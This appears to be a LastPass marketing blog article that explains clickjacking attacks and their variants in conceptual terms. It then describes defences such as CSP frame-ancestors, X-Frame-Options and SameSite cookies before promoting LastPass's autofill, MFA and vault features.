$5,000 - $25,000. In June 2024, this is how much hackers on the Dark Web were willing to pay for the Chrome clickjacking vulnerability CVE-2024-5843.
The vulnerability affected Chrome versions up to 126.0.6478.53, concealing security-related notifications in the browser’s interface. With the security UI elements obscured, users were more likely to put their online safety at risk by entering sensitive data on unsecured portals.
Google has since patched the vulnerability, but is your business safe from all clickjacking exploits?
Read on to learn about the newest threats and your options for staying safe.
Understanding Clickjacking
Definition and meaning of clickjacking
First, what is the root cause of clickjacking?
The term “clickjacking” refers to the hijacking of user clicks for malicious purposes.
It’s a client-side cyberattack, where malicious actors trick users into performing unintended actions.
Client-side attacks target end-user devices such as mobile phones, laptops, and desktops.
The attacker uses a social engineering technique like phishing or smishing to trick users into visiting a counterfeit web page and claiming a “prize” they supposedly won. This decoy page contains seemingly legitimate user elements like buttons, icons, and links.
Once there, the user clicks on the “Claim Now” button, unaware they are simultaneously performing another action on a hidden page.
This hidden page is an iframe or invisible frame overlaid on top of the counterfeit page. Any actions performed here – even though unknown to the user – will almost certainly have negative real-world consequences.
Ultimately, the root cause of clickjacking is the attacker’s desire for financial, social, or political gain -- achieved through the manipulation of a web page’s visual display.
How clickjacking attacks work
Do you enjoy shopping on Amazon? If so, you aren’t alone: the platform is one of the three most-visited ecommerce sites in the world (the other two being AliExpress and eBay).
Amazon accounts for almost 40% of e-commerce sales worldwide. For many users, staying logged in with 1-Click ordering enabled is a convenient option.
But it’s also a dangerous one.
Imagine it’s Friday evening, and one of your family members is on Facebook, uploading pictures from a recent vacation. Suddenly, they see a pop-up ad for a hugely discounted plane ticket to Oahu, Hawaii’s third-largest island. Curious, they click on the ad.
Unbeknownst to them, the “Claim Your 75% Off Plane Ticket” button is positioned over an invisible “Buy Now” button for a waterproof GoPro camera on Amazon.
Once the ad button is clicked, the “Buy Now” button is activated, completing the purchase with Amazon’s 1-Click ordering.
Your bank then charges $399.99 to your credit card, which you’ll now have to dispute as a fraudulent transaction.
Examples of clickjacking attacks
So, what are examples of clickjacking?
Some of the most popular techniques include:
- Likejacking: This type of attack tricks users into clicking “Like” unknowingly on social media platforms like Facebook. In 2010, Facebook users were tricked into liking a page called 101 Hottest Women in the World.
- Cookiejacking: In this type of attack, hackers focus on exploiting browser vulnerabilities to steal your session cookies – so they can access saved or stored credit card data.
- Mousejacking: In a mousejacking attack, the hacker uses specially crafted hardware to intercept signals between a wireless mouse and PC.
After hijacking the signals, the hacker is able to control the legitimate mouse and type their own commands to the PC. This potentially allows them to run malicious scripts that can execute malware on your device.
- Cursorjacking: Here, the attacker manipulates the position of your cursor. So, when you click on a legitimate button or link, your cursor simultaneously clicks on a hidden link that downloads malware to your device or directs you to a malicious page.
Newer cursorjacking techniques may leverage JavaScript or advanced CSS properties to create more convincing visual deceptions. Be sure to check whether your mouse and keyboard are susceptible to mousejack keystroke injection attacks.
- Media Filejacking: This type of clickjacking attack was first reported in 2019. It allowed hackers to intercept and manipulate media files in external storage before they are displayed on the app’s user interface. Media clickjacking mostly affected WhatsApp and Telegram on Android devices.
- Gesturejacking: Move over clickjacking; we now have gesturejacking. Here, the attacker creates a malicious OAuth app and URL. When you head to this seemingly innocent URL, you’re told to “Press and hold Enter to continue.”
If you comply, a very small window is opened – and your long-press action is transferred to this new window. Because the window is opened in response to your gesture, it evades the typical pop-up blocker. Your long-press action activates the Authorize button for the malicious OAuth app. This then gives the attacker’s app instant API access to your personal, financial, and business data.
Types of Clickjacking Attacks
UI redressing as a clickjacking technique
Clickjacking is also generally known as an UI redress attack.
As mentioned, this type of attack involves an invisible overlay on top of decoy elements like links and buttons. With clickjacking evolving into more advanced forms like gesturejacking (also known as cross-window forgery), prevention is key to your safety. This includes:
- Regularly updating your browser
- Remaining vigilant about unfamiliar prompts and URLs
- Installing anti-clickjacking extensions
Clickjacking with prefilled form input
Here, attackers prefill login credentials that users unintentionally submit.
An example is overlaying an iframe with a prefilled form and invisible “Submit” button on top of a fake button that says, “Play video.”
Let’s say the prefilled form contains your banking details, acquired from a high-profile breach.
Once you click on the “Play” button, an unauthorized payment is made, which you’ll be liable for.
Combining clickjacking with a DOM XSS attack
A dangerous attack involves a combination of clickjacking and exploiting a DOM Cross-Site Scripting (XSS) vulnerability to steal your login credentials.
By injecting malicious scripts into a webpage’s Document Object Model (DOM), attackers can manipulate page elements to perform unauthorized actions.
For example, you see an email in your inbox warning about a (fake) Facebook breach. The email tells you to reset your Facebook password. When you click on the Reset link, you’re sent to a counterfeit Facebook login page, where you’re asked to input your current credentials.
Meanwhile, the attackers have overlaid an iframe with the real Facebook login page (invisible to you) on top of the fake login page (visible to you). They also exploit a DOM XSS vulnerability to inject malicious code into your browser – so, any credentials you enter is theirs for the taking.
Implications of Clickjacking
Potential risks to user privacy and security
Clickjacking comes with three main risks:
- Identity theft: This is the biggest risk of clickjacking. Identity theft shows no signs of waning – there's a victim every 22 seconds, and cases have tripled over the last decade.
- Financial losses: During a clickjacking attack, the hacker can trick you into making fraudulent transactions or authorizing transfers that drain your accounts.
- Privacy violations: One of the most frightening risks of clickjacking is the hijacking of webcams and microphones. In 2019, attackers managed to lure Mac users to a malicious site with embedded iframes. There, the users were tricked into launching Zoom meetings, giving the attackers immediate access to their webcams. Fortunately, the vulnerability (dubbed CVE-2019-13450) has since been patched.
Effects on online payment systems and social media platforms
As can be seen, attackers can leverage clickjacking attacks to redirect payments and steal banking details.
Meanwhile, social media platforms are favorite targets for likejacking, where attackers trick users into liking scam accounts or following accounts they never intended to support.
For example, you click on a button to watch a funny video or claim a coupon. However, the attacker overlays a hidden “Like” button over the video or coupon. Your click ends up endorsing misinformation about a food supplement, political figure, or religious issue.
Consequences of falling victim to clickjacking
Attackers can combine clickjacking with phishing to perform actions that negatively impact your business.
For example, your employee receives a phishing email that directs them to a clickjacking site to update their password.
What your employee sees is a seemingly legitimate login form for their employee portal.
They proceed to enter their current credentials into the visible form fields. Unbeknownst to them, they’re actually typing into an invisible login form that’s positioned precisely over the visible (fake) form.
Without knowing it, your employee has now compromised your organization’s employee, trade, and financial data.
At this point, many people ask, “Is clickjacking a serious vulnerability today?”
It's important to note that modern browser security measures can largely prevent these types of attacks today, but new threats emerge daily. To protect your business, it’s important to keep all software patched, implement client and server-side protections, and leverage domain-verified auto filling and encrypted credential storage.
Read on to find out how you can do this.
Preventing Clickjacking: Clickjacking Defense Techniques
Using the frame-ancestors directive in a Content Security Policy (CSP)
So, what is the solution for clickjacking?
According to OWASP, there are both client-side and server-side solutions on the market.
Client-side solutions include browser extensions like NoScript (primarily for Mozilla Firefox) that prevents the execution of JavaScript, Flash, and other plugins without explicit permission from you.
Meanwhile, software solutions like GuardedID secures browser interactions, so your keystrokes aren’t intercepted. GuardedID’s NoClickjack browser extension protects you on these browsers: Microsoft Edge, Mozilla Firefox, Safari, and Google Chrome.
For server-side solutions, we have frame busting techniques like the frame-ancestors directive in CSPs and X-Frame-Options.
First, we’ll discuss a Content Security Policy (CSP), which is a Web standard specifying which domains or subdomains can embed elements into a web page. It’s effective against client-side attacks like XSS and clickjacking.
The CSP was created by the World Wide Web Consortium (W3C), the international organization responsible for the technical standards and guidelines that ensure the Web’s continued viability.
As of 2024, the CSP is still in the Working Draft stage; although widely implemented in most modern web browsers, it isn’t yet a finalized W3C Recommendation.
A CSP is generally implemented using an HTTP response header. The header contains one or more directives – these are rules or security instructions defining the types of content a browser can load and the trusted sources from which they can be loaded.
For example, the frame-ancestors directive is particularly effective against clickjacking because it prevents unauthorized third parties from embedding iframes into your webpages.
An example of a CSP with a frame-ancestors directive is frame-ancestors ‘self.’ Here, only the site’s own domain (‘self’) and specific trusted sites can load the page in an iframe.
script-src 'self' js.example.com
- script-src governs JavaScript sources
- ‘self’ means a JavaScript script can be downloaded from the same origin as the current page. So, if your page is at https://example.com, then the same origin would be https://example.com
- js.example.com specifies an extra source from which scripts can be loaded.
Meanwhile, frame-ancestors ‘none’ prevents all iframes from being embedded in a web page.
Utilizing X-Frame-Options Response Headers
The X-Frame-Options HTTP response header is an older directive which tells your browser how to handle iframe embedding.
The X-Frame-Options (obsoleted by the frame-ancestors directive) provides three security instructions:
DENY: The page can’t be displayed in an iframe, no matter where the request originates.
SAMEORIGIN: The page can be displayed in an iframe, but only by requests from the same domain.
ALLOW-FROM: The page can be displayed in an iframe, but only by requests from specific trusted domains. This directive is deprecated (usable but regarded as obsolete) in modern browsers.
Generally, the X-Frame-Options directive is still applicable in 2024, but cybersecurity professionals recommend the CSP header with the frame-ancestors directive for more robust, fine-grained control over framing actions.
For example, you can implement X-Frame-Options with CSP frame-ancestors in Apache and NGINX (web servers that handle HTTP requests). Older browsers that don’t support CSP will fall back on X-Frame-Options.
So, using both X-Frame-Options and CSP frame-ancestors provides a powerful defense against clickjacking in a wide range of browsers.
You can also combine the above with a Sameorigin Policy (SOP), which restricts how scripts from one origin (or domain) can interact with resources from another origin.
Enhancing Security with SameSite Cookies
SameSite cookies are a security feature that can help prevent both Cross-Site Request Forgery (CSRF) and clickjacking attacks.
Proper configuration of SameSite cookies ensures sensitive cookies (such as session cookies) are sent across domains only in specific contexts.
STRICT: The cookie is only sent in first-party requests. This means a cookie won’t be sent if you click a link from another site. For example, you’re logged into GitHub and click a link to a private GitHub project from an external corporate discussion forum. With the STRICT option, you won’t be able to see the project; you’ll have to log in again to gain access to it.
LAX: The cookie is sent when following a request from a normal, external link (like the one described in the above GitHub scenario). However, it won’t be sent in POST requests because this type of request is vulnerable to CSRF (cross-site request forgery) attacks. Here’s why: POST requests are often used for actions like transferring funds or completing purchases, prime targets for CSRF attacks.
NONE: The cookie is sent in all requests. However, when using SameSite=None, the Secure attribute must also be included, so that the cookie is only sent over HTTPS connections.
Protecting Yourself from Clickjacking with LastPass
Auto filling for passwords
The ease and security of Autofill is yours to enjoy with a LastPass subscription.
With LastPass, attackers can’t leverage iframes to trick your employees into exposing sensitive credentials.
Here’s the powerful reason why: If the visible domain doesn’t match the correct URL, LastPass won’t autofill your credentials.
MFA integration
At LastPass, our groundbreaking adaptive MFA is your secure defense against clickjacking. Even if attackers somehow manage to access your primary login credentials, they’ll still need access to your chosen MFA authentication option to exfiltrate your data.
With LastPass, you get superior protection with your choice of biometric, device-based, contextual, or hardware key authentication.
Dark web monitoring
We think Dark Web Monitoring is so important we’ve given all LastPass users (even those on free plans) access to it. With Dark Web Monitoring, you’ll never go a day without the security of knowing you’re protected. If your credentials end up on the Dark Web, we send you an alert so you can instantly generate a new, secure password with our Password Generator.
Encrypted vault
With LastPass, your vault is protected with an ironclad, military-grade AES-GCM-256 encryption.
This means every credential you or your employees enter in a LastPass vault is unreadable to hackers – and anyone at LastPass.
At LastPass, we never stop working to ensure your safety and security. Sign up for a free, no-obligation LastPass Business trial on us.
